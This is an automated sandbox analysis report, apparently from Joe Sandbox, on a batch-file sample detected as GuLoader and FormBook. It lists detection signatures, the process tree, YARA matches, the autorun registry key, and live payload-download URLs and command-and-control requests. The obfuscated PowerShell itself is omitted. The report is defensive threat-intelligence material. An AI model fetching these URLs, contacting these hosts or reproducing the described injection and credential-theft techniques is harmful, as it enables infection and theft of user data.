
Windows Analysis Report
rFV-452747284IN.bat

Overview

General Information

Sample name: rFV-452747284IN.bat
Analysis ID: 1471448
MD5: 4eeae7ac7c9b2b2f6585cbfdb82ffd89
SHA1: 7978841d26d2be27f6b873a6b3fca3bd999329aa
SHA256: 96510f0af47cb70914f106bd98fc99b4a5f782c744dbe587368f8614565a6f47
Tags: bat

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Obfuscated command line found
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 4204 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rFV-452747284IN.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4324 cmdline: powershell.exe -windowstyle hidden "[long obfuscated PowerShell command line omitted]" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5344 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7108 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "[long obfuscated PowerShell command line omitted]" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 1076 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 2508 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 4820 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • nPzDKsDmTWqJ.exe (PID: 6192 cmdline: "C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • clip.exe (PID: 5016 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
              • nPzDKsDmTWqJ.exe (PID: 3228 cmdline: "C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 6844 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wab.exe (PID: 5284 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 3856 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 3424 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
amsi64_4324.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_7108.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0xe411:$b2: ::FromBase64String(
  • 0xd495:$s1: -join
  • 0x6c41:$s4: +=
  • 0x6d03:$s4: +=
  • 0xaf2a:$s4: +=
  • 0xd047:$s4: +=
  • 0xd331:$s4: +=
  • 0xd477:$s4: +=
  • 0x16e51:$s4: +=
  • 0x16ed1:$s4: +=
  • 0x16f97:$s4: +=
  • 0x17017:$s4: +=
  • 0x171ed:$s4: +=
  • 0x17271:$s4: +=
  • 0xdcb8:$e4: Get-WmiObject
  • 0xdea7:$e4: Get-Process
  • 0xdeff:$e4: Start-Process
  • 0x17af2:$e4: Get-Process

System Summary

Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe" , CommandLine: "C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe, NewProcessName: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe, OriginalFileName: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 4820, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe" , ProcessId: 6192, ProcessName: nPzDKsDmTWqJ.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Program Files (x86)\windows mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\clip.exe, ProcessId: 5016, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FLY4H
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "[long obfuscated PowerShell command line omitted]"
No Snort rule has matched

AV Detection

Source: Yara match | File source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown | HTTPS traffic detected: 103.211.216.55:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.83.114.124:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2595452528.00000000026D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nPzDKsDmTWqJ.exe, 0000000D.00000002.3286344081.000000000099E000.00000002.00000001.01000000.00000009.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000000.2862732022.000000000099E000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000003.2698808287.000000002118F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2695801155.0000000020FD2000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2793819651.00000000041DB000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2791227539.0000000004027000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000003.2698808287.000000002118F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2695801155.0000000020FD2000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2793819651.00000000041DB000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2791227539.0000000004027000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: clip.pdb source: wab.exe, 0000000A.00000002.2803637542.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2790925038.0000000005894000.00000004.00000020.00020000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287519662.0000000001228000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbOS_1 source: powershell.exe, 00000006.00000002.2603068995.0000000006DB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: clip.exe, 0000000E.00000002.3034173382.0000000002795000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3035044286.00000000049BC000.00000004.10000000.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3288413199.000000000335C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.3286106030.0000000002C0C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: clip.pdbGCTL source: wab.exe, 0000000A.00000002.2803637542.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2790925038.0000000005894000.00000004.00000020.00020000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287519662.0000000001228000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdb source: clip.exe, 0000000E.00000002.3034173382.0000000002795000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3035044286.00000000049BC000.00000004.10000000.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3288413199.000000000335C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.3286106030.0000000002C0C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\clip.exe | Code function: 4x nop then mov ebx, 00000004h | 14_2_0410053E
Source: Joe Sandbox View | IP Address: 137.220.252.40 137.220.252.40
Source: Joe Sandbox View | IP Address: 103.211.216.55 103.211.216.55
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /Teglbrnderier.snp HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: econstramedia.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cyoeNvCnByBgIccf106.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: tejarat-gram.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /abt9/?9Z=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA==&et=y8bdBnFxh HTTP/1.1 | Host: www.387mfyr.sbs | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: econstramedia.com
Source: global traffic | DNS traffic detected: DNS query: tejarat-gram.com
Source: global traffic | DNS traffic detected: DNS query: www.387mfyr.sbs
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Jul 2024 11:13:26 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to 
disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: powershell.exe, 00000002.00000002.2676908223.000001B101E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://econstramedia.com
          Source: powershell.exe, 00000002.00000002.2767467645.000001B110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.2676908223.000001B100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2596172114.00000000041E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000002.00000002.2676908223.000001B100001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000006.00000002.2596172114.00000000041E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.c
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.co
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2676908223.000001B100477000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2676908223.000001B101D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/T
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Te
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teg
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Tegl
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglb
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbr
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrn
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnd
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnde
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnder
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderi
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderie
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderier
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderier.
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderier.s
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderier.sn
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2676908223.000001B10022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderier.snp
          Source: powershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderier.snpXR
          Source: powershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000006.00000002.2603068995.0000000006D19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.mic
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: clip.exe, 0000000E.00000002.3034173382.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: clip.exe, 0000000E.00000002.3034173382.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: clip.exe, 0000000E.00000002.3034173382.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: clip.exe, 0000000E.00000002.3034173382.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
          Source: clip.exe, 0000000E.00000002.3034173382.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: clip.exe, 0000000E.00000002.3034173382.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: clip.exe, 0000000E.00000003.2973665142.000000000750C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
          Source: powershell.exe, 00000002.00000002.2767467645.000001B110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: wab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/
          Source: wab.exe, 0000000A.00000002.2803376291.0000000005830000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2803162062.00000000056D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/cyoeNvCnByBgIccf106.bin
          Source: wab.exe, 0000000A.00000002.2803376291.0000000005830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/cyoeNvCnByBgIccf106.binO
          Source: wab.exe, 0000000A.00000002.2803162062.00000000056D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/cyoeNvCnByBgIccf106.binRhypsPosvilla-ventura.com/cyoeNvCnByBgIccf106.bin
          Source: wab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/cyoeNvCnByBgIccf106.binU
